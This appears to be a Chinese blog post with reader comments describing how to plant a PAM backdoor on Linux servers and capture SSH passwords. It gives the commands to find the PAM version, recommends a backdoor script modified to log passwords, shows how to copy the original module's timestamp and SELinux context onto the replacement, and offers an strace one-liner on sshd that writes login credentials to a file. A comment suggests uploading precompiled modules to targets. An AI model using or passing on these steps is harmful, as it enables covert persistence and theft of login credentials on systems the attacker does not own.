一般路过PAM后门 / SSH密码记录

直接开始

原理很多咱也不多说了,主要聊聊版本查询的问题。
中文搜索直接搜索关于pam版本信息的,大部分都是关于pam后门,内容几乎千篇一律,少部分是讲解PAM作用的。

rpm -qa |grep pam

然后debian系的下运行这个命令很大概率回会啥也不返回。这时候我们就应该用

dpkg -l | grep pam

这样子就行了
QQ截图20210204235236.png

推荐一个脚本

Linux-PAM-BACKDOOR

当然我也是fork来的(还没push,咕咕咕),不过我在此基础上稍微加了个记录密码的功能。

之后就是克隆时间了

touch pam_unix.so -r pam_unix.so.src
ls -Z pam_unix.so.src
chcon –reference=pam_unix.so.src pam_unix.so

另外一种方案

如果只是为了记录密码

昨晚还从九世那学来一种新的

pid=ps -elf | grep "sshd -D" | grep -v grep | awk '{print $4}'
screen strace -f -p $pid -o /tmp/test.log -e trace=read,write -s 2048 &

photo_2021-02-06_18-24-01.jpg

Tags: none

已有 2 条评论 »

    1. nya 2021-02-19 at 00:02

      编译好直接上传啊,常见版本就那么几个,对面又整天没gcc没啥的

    2. 非科学のカッパ 2021-02-05 at 23:02

      爷关更

添加新评论 »